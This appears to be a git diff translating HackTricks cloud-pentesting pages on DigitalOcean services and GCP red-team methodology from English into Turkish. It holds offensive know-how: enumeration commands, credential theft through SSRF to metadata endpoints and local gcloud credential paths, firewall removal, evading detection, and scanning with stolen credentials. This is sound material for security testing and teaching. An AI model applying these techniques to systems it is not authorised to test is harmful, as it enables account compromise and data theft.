Unlike snapshots, backups are stored in a compressed and encrypted format, and they are transferred off of DigitalOcean's infrastructure to a remote location for safekeeping. This makes backups ideal for disaster recovery, as they provide a complete copy of a Droplet that can be restored in the event of data loss or other catastrophic events.
Snapshot'ların aksine, yedeklemeler sıkıştırılmış ve şifrelenmiş bir formatta saklanır ve DigitalOcean'ın altyapısından uzak bir konuma güvenli bir şekilde aktarılır. Bu, yedeklemeleri felaket kurtarma için ideal hale getirir, çünkü veri kaybı veya diğer felaket olayları durumunda geri yüklenebilecek bir Droplet'in tam bir kopyasını sağlar.
In summary, snapshots are point-in-time copies of a Droplet's disk, while backups are complete copies of a Droplet, including its settings and metadata. Snapshots are stored on DigitalOcean's object storage service, while backups are transferred off of DigitalOcean's infrastructure to a remote location. Both snapshots and backups can be used to restore a Droplet, but snapshots are more efficient to use and store, while backups provide a more comprehensive backup solution for disaster recovery.
Özetle, snapshot'lar bir Droplet'in diskine ait zaman noktası kopyalarıdır, yedeklemeler ise bir Droplet'in, ayarları ve meta verileri dahil olmak üzere tam kopyalarıdır. Snapshot'lar DigitalOcean'ın nesne depolama hizmetinde saklanırken, yedeklemeler DigitalOcean'ın altyapısından uzak bir konuma aktarılır. Hem snapshot'lar hem de yedeklemeler bir Droplet'i geri yüklemek için kullanılabilir, ancak snapshot'lar kullanımı ve depolamayı daha verimli hale getirirken, yedeklemeler felaket kurtarma için daha kapsamlı bir yedekleme çözümü sunar.
</details>
### Authentication
### Kimlik Doğrulama
For authentication it's possible to **enable SSH** through username and **password** (password defined when the droplet is created). Or **select one or more of the uploaded SSH keys**.
Kimlik doğrulama için, kullanıcı adı ve **şifre** (droplet oluşturulduğunda tanımlanan şifre) aracılığıyla **SSH'yi etkinleştirmek** mümkündür. Veya **yüklenen SSH anahtarlarından bir veya daha fazlasını seçebilirsiniz**.
### Firewall
### Güvenlik Duvarı
> [!CAUTION]
> By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
> [!DİKKAT]
> Varsayılan olarak **droplet'ler GÜVENLİK DUVARI OLMADAN oluşturulur** (AWS veya GCP gibi diğer bulutlarda olduğu gibi değil). Bu nedenle, DO'nun droplet'in (VM) portlarını korumasını istiyorsanız, **oluşturmanız ve eklemeniz** gerekir.
More info in:
Daha fazla bilgi için:
{{#ref}}
do-networking.md
{{#endref}}
### Enumeration
### Sayım
```bash
# VMs
doctl compute droplet list # IPs will appear here
@@ -68,18 +67,13 @@ doctl compute certificate list
# Snapshots
doctl compute snapshot list
```
> [!CAUTION]
> **Droplets have metadata endpoints**, but in DO there **isn't IAM** or things such as role from AWS or service accounts from GCP.
> **Droplets, metadata uç noktalarına** sahiptir, ancak DO'da **IAM** veya AWS'deki rol ya da GCP'deki hizmet hesapları gibi şeyler **yoktur**.
### RCE
With access to the console it's possible to **get a shell inside the droplet** accessing the URL: **`https://cloud.digitalocean.com/droplets/<droplet-id>/terminal/ui/`**
Konsola erişim ile **droplet içinde bir shell almak** mümkündür, URL'ye erişerek: **`https://cloud.digitalocean.com/droplets/<droplet-id>/terminal/ui/`**
It's also possible to launch a **recovery console** to run commands inside the host accessing a recovery console in **`https://cloud.digitalocean.com/droplets/<droplet-id>/console`**(but in this case you will need to know the root password).
Ayrıca, **`https://cloud.digitalocean.com/droplets/<droplet-id>/console`** adresinde bir kurtarma konsolu başlatarak host içinde komutlar çalıştırmak da mümkündür (ancak bu durumda root şifresini bilmeniz gerekecektir).
{{#include ../../../banners/hacktricks-training.md}}

40
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
View File

@@ -2,39 +2,34 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance.
DigitalOcean Functions, diğer adıyla "DO Functions," altyapı ile ilgili endişelenmeden **kod çalıştırmanıza** olanak tanıyan bir sunucusuz bilişim platformudur. DO Functions ile kodunuzu **API**, **HTTP istekleri** (eğer etkinleştirilmişse) veya **cron** aracılığıyla **tetiklenebilen** "fonksiyonlar" olarak yazıp dağıtabilirsiniz. Bu fonksiyonlar tamamen yönetilen bir ortamda çalıştırılır, bu nedenle **ölçeklendirme, güvenlik veya bakım** konusunda endişelenmenize gerek yoktur.
In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\
Inside the namespace you can then create a function.
DO'da bir fonksiyon oluşturmak için önce **bir ad alanı oluşturmanız** gerekir; bu, **fonksiyonları gruplandıracaktır**.\
Ad alanının içinde bir fonksiyon oluşturabilirsiniz.
### Triggers
The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like:
### Tetikleyiciler
**REST API aracılığıyla bir fonksiyonu tetikleme** yöntemi (her zaman etkin, cli'nin kullandığı yöntem) bir **kimlik doğrulama token'ı** ile bir istek tetiklemektir:
```bash
curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \
-H "Content-Type: application/json" \
-H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
-H "Content-Type: application/json" \
-H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
```
To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:**
Bu **`doctl`** cli aracının bu token'ı nasıl aldığını görmek için (bunu tekrarlayabilmeniz için), **aşağıdaki komut tam ağ izini gösterir:**
```bash
doctl serverless connect --trace
```
**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**.
**HTTP tetikleyici etkinleştirildiğinde**, bir web işlevi bu **HTTP yöntemleri GET, POST, PUT, PATCH, DELETE, HEAD ve OPTIONS** aracılığıyla çağrılabilir.
> [!CAUTION]
> In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\
> I couldn't find any way to read them from the CLI but from the console it's straight forward.
> DO işlevlerinde, **ortam değişkenleri şifrelenemez** (bu yazının yazıldığı sırada).\
> CLI'den okumak için herhangi bir yol bulamadım ama konsoldan oldukça basit.
**Functions URLs** look like this: `https://<random>.doserverless.co/api/v1/web/<namespace-id>/default/<function-name>`
### Enumeration
**İşlev URL'leri** şu şekilde görünür: `https://<random>.doserverless.co/api/v1/web/<namespace-id>/default/<function-name>`
### Sayım
```bash
# Namespace
doctl serverless namespaces list
@@ -53,12 +48,7 @@ doctl serverless activations result <activation-id> # get only the response resu
# I couldn't find any way to get the env variables form the CLI
```
> [!CAUTION]
> There **isn't metadata endpoint** from the Functions sandbox.
> Functions sandbox'tan **metadata endpoint** yoktur.
{{#include ../../../banners/hacktricks-training.md}}

14
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
View File

@@ -2,22 +2,16 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need.
DigitalOcean Görüntüleri, **yeni Droplet'ler (sanallaştırılmış makineler) oluşturmak için kullanılabilen önceden oluşturulmuş işletim sistemi veya uygulama görüntüleridir**. Sanal makine şablonlarına benzerler ve ihtiyacınız olan işletim sistemi ve uygulamalarla **yeni Droplet'leri hızlı ve kolay bir şekilde oluşturmanıza** olanak tanır.
DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community.
DigitalOcean, Ubuntu, CentOS ve FreeBSD gibi popüler işletim sistemlerinin yanı sıra LAMP, MEAN ve LEMP yığınları gibi önceden yapılandırılmış uygulama Görüntüleri de dahil olmak üzere geniş bir Görüntü yelpazesi sunar. Kendi özel Görüntülerinizi oluşturabilir veya topluluktan Görüntüler kullanabilirsiniz.
When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future.
DigitalOcean'da yeni bir Droplet oluşturduğunuzda, Droplet için bir temel olarak kullanmak üzere bir Görüntü seçebilirsiniz. Bu, yeni Droplet üzerinde işletim sistemini ve önceden yüklenmiş uygulamaları otomatik olarak kurar, böylece hemen kullanmaya başlayabilirsiniz. Görüntüler ayrıca Droplet'lerinizin anlık görüntülerini ve yedeklerini oluşturmak için de kullanılabilir, böylece gelecekte aynı yapılandırmadan yeni Droplet'ler kolayca oluşturabilirsiniz.
### Enumeration
```
doctl compute image list
```
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
View File

@@ -2,19 +2,18 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
### DigitalOcean Kubernetes (DOKS)
DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include:
DOKS, DigitalOcean tarafından sunulan yönetilen bir Kubernetes hizmetidir. Hizmet, **DigitalOcean'un platformunda Kubernetes kümelerini dağıtmak ve yönetmek için tasarlanmıştır**. DOKS'in ana özellikleri şunlardır:
1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters.
2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters.
3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage.
4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date.
### Connection
1. **Yönetim Kolaylığı**: Temel altyapıyı kurma ve sürdürme gereksinimi ortadan kaldırılarak, Kubernetes kümelerinin yönetimi basitleştirilmiştir.
2. **Kullanıcı Dostu Arayüz**: Kümelerin oluşturulmasını ve yönetilmesini kolaylaştıran sezgisel bir arayüz sunar.
3. **DigitalOcean Hizmetleri ile Entegrasyon**: Yük Dengeleyiciler ve Blok Depolama gibi DigitalOcean tarafından sağlanan diğer hizmetlerle sorunsuz bir şekilde entegre olur.
4. **Otomatik Güncellemeler ve Yükseltmeler**: Hizmet, kümelerin güncel kalmasını sağlamak için otomatik güncelleme ve yükseltme içerir.
### Bağlantı
```bash
# Generate kubeconfig from doctl
doctl kubernetes cluster kubeconfig save <cluster-id>
@@ -22,9 +21,7 @@ doctl kubernetes cluster kubeconfig save <cluster-id>
# Use a kubeconfig file that you can download from the console
kubectl --kubeconfig=/<pathtodirectory>/k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes
```
### Enumeration
### Sayım
```bash
# Get clusters
doctl kubernetes cluster list
@@ -35,9 +32,4 @@ doctl kubernetes cluster node-pool list <cluster-id>
# Get DO resources used by the cluster
doctl kubernetes cluster list-associated-resources <cluster-id>
```
{{#include ../../../banners/hacktricks-training.md}}

22
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
View File

@@ -2,48 +2,34 @@
{{#include ../../../banners/hacktricks-training.md}}
### Domains
### Alan Adları
```bash
doctl compute domain list
doctl compute domain records list <domain>
# You can also create records
```
### Reserverd IPs
### Ayrılmış IP'ler
```bash
doctl compute reserved-ip list
doctl compute reserved-ip-action unassign <ip>
```
### Load Balancers
### Yük Dengeleyicileri
```bash
doctl compute load-balancer list
doctl compute load-balancer remove-droplets <id> --droplet-ids 12,33
doctl compute load-balancer add-forwarding-rules <id> --forwarding-rules entry_protocol:tcp,entry_port:3306,...
```
### VPC
```
doctl vpcs list
```
### Firewall
> [!CAUTION]
> By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
> Varsayılan olarak **damlalar ATEŞ DUVARI OLMADAN oluşturulur** (AWS veya GCP gibi diğer bulutlarda olduğu gibi değil). Bu nedenle, DO'nun damlanın (VM) portlarını korumasını istiyorsanız, **onu oluşturmalı ve eklemelisiniz**.
```bash
doctl compute firewall list
doctl compute firewall list-by-droplet <droplet-id>
doctl compute firewall remove-droplets <fw-id> --droplet-ids <droplet-id>
```
{{#include ../../../banners/hacktricks-training.md}}

18
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
View File

@@ -1,27 +1,21 @@
# DO - Projects
# DO - Projeler
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\
> For more info check:
> proje, tüm **hizmetler** (droplet'lar, alanlar, veritabanları, kubernetes...) **içinde birlikte çalışan** bir kapsayıcıdır.\
> Daha fazla bilgi için kontrol edin:
{{#ref}}
../do-basic-information.md
{{#endref}}
### Enumeration
It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily:
### Sayım
Bir kullanıcının erişim sağladığı **tüm projeleri ve bir projede çalışan tüm kaynakları** çok kolay bir şekilde **saymak** mümkündür:
```bash
doctl projects list # Get projects
doctl projects resources list <proj-id> # Get all the resources of a project
```
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
View File

@@ -2,25 +2,24 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers.
DigitalOcean Spaces, **nesne depolama hizmetleri**dir. Kullanıcılara **büyük miktarda veriyi**, örneğin resimler ve diğer dosyalar, ölçeklenebilir ve maliyet etkin bir şekilde **saklama ve sunma** imkanı tanır. Spaces, DigitalOcean kontrol paneli aracılığıyla veya DigitalOcean API'si kullanılarak erişilebilir ve Droplets (sanallaştırılmış özel sunucular) ve Yük Dengeleyicileri gibi diğer DigitalOcean hizmetleriyle entegre edilmiştir.
### Access
### Erişim
Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space.
Spaces **genel** (herkes internetten erişebilir) veya **özel** (sadece yetkilendirilmiş kullanıcılar) olabilir. Kontrol Paneli dışındaki bir özel alandaki dosyalara erişmek için bir **erişim anahtarı** ve **gizli anahtar** oluşturmalıyız. Bunlar, alanınıza erişim sağlamak için bir **kullanıcı adı** ve **şifre** olarak hizmet eden rastgele token çiftleridir.
A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\
Note the **region** as **subdomain**.
Bir **alanın URL'si** şu şekilde görünür: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\
**bölgeyi** **alt alan** olarak not edin.
Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials).
**Alan** **genel** olsa bile, içindeki **dosyalar** **özel** olabilir (onlara yalnızca kimlik bilgileriyle erişebilirsiniz).
However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time:
Ancak, dosya **özel** olsa bile, konsoldan `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` gibi bir bağlantıyla bir dosyayı belirli bir süre için paylaşmak mümkündür:
<figure><img src="../../../images/image (277).png" alt=""><figcaption></figcaption></figure>
### Enumeration
### Sayım
```bash
# Unauthenticated
## Note how the region is specified in the endpoint
@@ -42,9 +41,4 @@ aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname
## It's also possible to generate authorized access to buckets from the API
```
{{#include ../../../banners/hacktricks-training.md}}

10
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
View File

@@ -2,18 +2,12 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups.
DigitalOcean hacimleri, **Droplet'lere eklenip çıkarılabilen** **blok depolama** cihazlarıdır. Hacimler, verilerin **Droplet'in kendisinden bağımsız olarak kalıcı** olmasını gerektiren, veritabanları veya dosya depolama gibi **verileri depolamak** için yararlıdır. Boyutları değiştirilebilir, birden fazla Droplet'e eklenebilir ve yedekleme için anlık görüntü alınabilir.
### Enumeration
```
compute volume list
```
{{#include ../../../banners/hacktricks-training.md}}

128
src/pentesting-cloud/gcp-security/README.md
View File

@@ -2,60 +2,60 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
**Before start pentesting** a **GCP** environment, there are a few **basics things you need to know** about how it works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
**GCP** ortamında **pentesting** yapmaya başlamadan önce, nasıl çalıştığına dair bilmeniz gereken birkaç **temel şey** var. Bu, ne yapmanız gerektiğini, yanlış yapılandırmaları nasıl bulacağınızı ve bunları nasıl istismar edeceğinizi anlamanıza yardımcı olacaktır.
Concepts such as **organization** hierarchy, **permissions** and other basic concepts are explained in:
**Organizasyon** hiyerarşisi, **izinler** ve diğer temel kavramlar gibi kavramlar şunlarda açıklanmaktadır:
{{#ref}}
gcp-basic-information/
{{#endref}}
## Labs to learn
## Öğrenme Laboratuvarları
- [https://gcpgoat.joshuajebaraj.com/](https://gcpgoat.joshuajebaraj.com/)
- [https://github.com/ine-labs/GCPGoat](https://github.com/ine-labs/GCPGoat)
- [https://github.com/lacioffi/GCP-pentest-lab/](https://github.com/lacioffi/GCP-pentest-lab/)
- [https://github.com/carlospolop/gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts)
## GCP Pentester/Red Team Methodology
## GCP Pentester/Kırmızı Ekip Metodolojisi
In order to audit a GCP environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal GCP services an **external services** connected.
Bir GCP ortamını denetlemek için bilmek çok önemlidir: hangi **hizmetlerin kullanıldığı**, neyin **açık olduğu**, kimin neye **erişimi** olduğu ve iç GCP hizmetlerinin **harici hizmetlerle** nasıl bağlantılı olduğu.
From a Red Team point of view, the **first step to compromise a GCP environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
Kırmızı Ekip bakış açısından, bir GCP ortamını ele geçirmenin **ilk adımı** bazı **kimlik bilgilerini** elde etmektir. Bunu nasıl yapacağınıza dair bazı fikirler:
- **Leaks** in github (or similar) - OSINT
- **Social** Engineering (Check the page [**Workspace Security**](../workspace-security/))
- **Password** reuse (password leaks)
- Vulnerabilities in GCP-Hosted Applications
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
- **Local File Read**
- `/home/USERNAME/.config/gcloud/*`
- `C:\Users\USERNAME\.config\gcloud\*`
- 3rd parties **breached**
- **Internal** Employee
- Github'daki **sızıntılar** (veya benzeri) - OSINT
- **Sosyal** Mühendislik (Sayfayı kontrol edin [**Workspace Güvenliği**](../workspace-security/))
- **Şifre** yeniden kullanımı (şifre sızıntıları)
- GCP-Hosted Uygulamalardaki Güvenlik Açıkları
- [**Sunucu Tarafı İstek Sahteciliği**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) ile metadata uç noktasına erişim
- **Yerel Dosya Okuma**
- `/home/KULLANICI_ADI/.config/gcloud/*`
- `C:\Users\KULLANICI_ADI\.config\gcloud\*`
- 3. tarafların **ihlal edilmesi**
- **İç** Çalışan
Or by **compromising an unauthenticated service** exposed:
Ya da **kimlik doğrulaması yapılmamış bir hizmeti** ele geçirerek:
{{#ref}}
gcp-unauthenticated-enum-and-access/
{{#endref}}
Or if you are doing a **review** you could just **ask for credentials** with these roles:
Ya da bir **gözden geçirme** yapıyorsanız, bu rollerle **kimlik bilgilerini** isteyebilirsiniz:
{{#ref}}
gcp-permissions-for-a-pentest.md
{{#endref}}
> [!NOTE]
> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
> Kimlik bilgilerini elde etmeyi başardıktan sonra, bu kimlik bilgilerin kime ait olduğunu ve **neye erişimleri olduğunu** bilmeniz gerekir, bu nedenle bazı temel sayım işlemleri yapmanız gerekir:
## Basic Enumeration
## Temel Sayım
### **SSRF**
For more information about how to **enumerate GCP metadata** check the following hacktricks page:
GCP metadata'sını **sayım** yapmak hakkında daha fazla bilgi için aşağıdaki hacktricks sayfasını kontrol edin:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440
@@ -63,8 +63,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
### Whoami
In GCP you can try several options to try to guess who you are:
GCP'de kim olduğunuzu tahmin etmeye çalışmak için birkaç seçenek deneyebilirsiniz:
```bash
#If you are inside a compromise machine
gcloud auth list
@@ -74,60 +73,55 @@ gcloud auth print-identity-token #Get info from the token
#If you compromised a metadata token or somehow found an OAuth token
curl -H "Content-Type: application/x-www-form-urlencoded" -d "access_token=<token>" https://www.googleapis.com/oauth2/v1/tokeninfo
```
You can also use the API endpoint `/userinfo` to get more info about the user:
Kullanıcı hakkında daha fazla bilgi almak için `/userinfo` API uç noktasını da kullanabilirsiniz:
```bash
curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth $(gcloud auth print-access-token)" https://www.googleapis.com/oauth2/v1/userinfo
curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth <access_token>" https://www.googleapis.com/oauth2/v1/userinfo
```
### Org Enumeration
```bash
# Get organizations
gcloud organizations list #The DIRECTORY_CUSTOMER_ID is the Workspace ID
gcloud resource-manager folders list --organization <org_number> # Get folders
gcloud projects list # Get projects
```
### İlkeler ve IAM Sayımı
### Principals & IAM Enumeration
Yeterli izinleriniz varsa, **GCP hesabındaki her varlığın ayrıcalıklarını kontrol etmek**, sizin ve diğer kimliklerin neler yapabileceğini anlamanıza yardımcı olacaktır ve **ayrıcalıkları artırma** yollarını keşfetmenizi sağlar.
If you have enough permissions, **checking the privileges of each entity inside the GCP account** will help you understand what you and other identities can do and how to **escalate privileges**.
If you don't have enough permissions to enumerate IAM, you can **steal brute-force them** to figure them out.\
Check **how to do the numeration and brute-forcing** in:
IAM'yi saymak için yeterli izinleriniz yoksa, bunları **kaba kuvvetle çalabilirsiniz**.\
**Sayım ve kaba kuvvet uygulama** hakkında bilgi için:
{{#ref}}
gcp-services/gcp-iam-and-org-policies-enum.md
{{#endref}}
> [!NOTE]
> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
> In the following section you can check some ways to **enumerate some common services.**
> Artık **kimlik bilgileriniz hakkında bazı bilgilere sahipsiniz** (ve eğer bir kırmızı takım üyesiyseniz umarım **tespit edilmemişsinizdir**). Ortamda hangi hizmetlerin kullanıldığını anlamanın zamanı geldi.\
> Aşağıdaki bölümde **bazı yaygın hizmetleri saymanın** yollarını kontrol edebilirsiniz.
## Services Enumeration
## Hizmet Sayımı
GCP has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets, how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
GCP, şaşırtıcı miktarda hizmete sahiptir, aşağıdaki sayfada **temel bilgiler, sayım** kılavuzları, **tespiti önleme**, **kalıcılık** sağlama ve bazıları hakkında diğer **sonuç sonrası** hileler bulacaksınız:
{{#ref}}
gcp-services/
{{#endref}}
Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automatic-tools).
Tüm çalışmayı **manuel** olarak yapmanıza gerek olmadığını unutmayın, bu yazının aşağısında [**otomatik araçlar**](./#automatic-tools) hakkında bir **bölüm** bulabilirsiniz.
Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
Ayrıca, bu aşamada **kimlik doğrulaması yapılmamış kullanıcılara açık daha fazla hizmet keşfetmiş olabilirsiniz**, bunları istismar edebilirsiniz:
{{#ref}}
gcp-unauthenticated-enum-and-access/
{{#endref}}
## Privilege Escalation, Post Exploitation & Persistence
## Ayrıcalık Artırma, Sonuç Sonrası ve Kalıcılık
The most common way once you have obtained some cloud credentials or have compromised some service running inside a cloud is to **abuse misconfigured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
Biraz bulut kimlik bilgisi elde ettiğinizde veya bulut içinde çalışan bir hizmeti ele geçirdiğinizde en yaygın yol, **yanlış yapılandırılmış ayrıcalıkları** kötüye kullanmaktır. Bu nedenle, yapmanız gereken ilk şey ayrıcalıklarınızı saymaktır.
Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.
Ayrıca, bu sayım sırasında **izinlerin "Organizasyon"** seviyesinde de ayarlanabileceğini unutmayın.
{{#ref}}
gcp-privilege-escalation/
@@ -141,32 +135,31 @@ gcp-post-exploitation/
gcp-persistence/
{{#endref}}
### Publicly Exposed Services
### Kamuya Açık Hizmetler
While enumerating GCP services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
GCP hizmetlerini sayarken, bazılarını **İnternete elemanlar açtığını** bulmuş olabilirsiniz (VM/Konteyner portları, veritabanları veya kuyruk hizmetleri, anlık görüntüler veya kovalar...).\
Pentester/kırmızı takım üyesi olarak, bunlarda **hassas bilgiler / zafiyetler** bulup bulamayacağınızı her zaman kontrol etmelisiniz, çünkü bunlar size **AWS hesabına daha fazla erişim** sağlayabilir.
In this book you should find **information** about how to find **exposed GCP services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
Bu kitapta, **açık GCP hizmetlerini bulma ve bunları kontrol etme** hakkında **bilgi** bulmalısınız. **Açık ağ hizmetlerinde zafiyetler bulma** hakkında, belirli **hizmeti** aramanızı öneririm:
{{#ref}}
https://book.hacktricks.xyz/
{{#endref}}
## GCP <--> Workspace Pivoting
## GCP <--> Workspace Pivotlama
**Compromising** principals in **one** platform might allow an attacker to **compromise the other one**, check it in:
**Bir** platformdaki **ilkeleri ele geçirmek**, bir saldırganın **diğerini ele geçirmesine** olanak tanıyabilir, bunu kontrol edin:
{{#ref}}
gcp-to-workspace-pivoting/
{{#endref}}
## Automatic Tools
- In the **GCloud console**, in [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) you can see resources and IAMs being used by project.
- Here you can see the assets supported by this API: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
- Check **tools** that can be [**used in several clouds here**](../pentesting-cloud-methodology.md).
- [**gcp_scanner**](https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what **level of access certain credentials posses** on GCP.
## Otomatik Araçlar
- **GCloud konsolunda**, [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) adresinde proje tarafından kullanılan kaynakları ve IAM'leri görebilirsiniz.
- Bu API tarafından desteklenen varlıkları burada görebilirsiniz: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
- [**Birçok bulutta kullanılabilecek araçları burada**](../pentesting-cloud-methodology.md) kontrol edin.
- [**gcp_scanner**](https://github.com/google/gcp_scanner): Bu, GCP'deki belirli kimlik bilgilerinin **hangi erişim seviyesine sahip olduğunu** belirlemeye yardımcı olabilecek bir GCP kaynak tarayıcısıdır.
```bash
# Install
git clone https://github.com/google/gcp_scanner.git
@@ -177,13 +170,11 @@ pip install -r requirements.txt
# Execute with gcloud creds
python3 __main__.py -o /tmp/output/ -g "$HOME/.config/gcloud"
```
- [**gcp_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file.
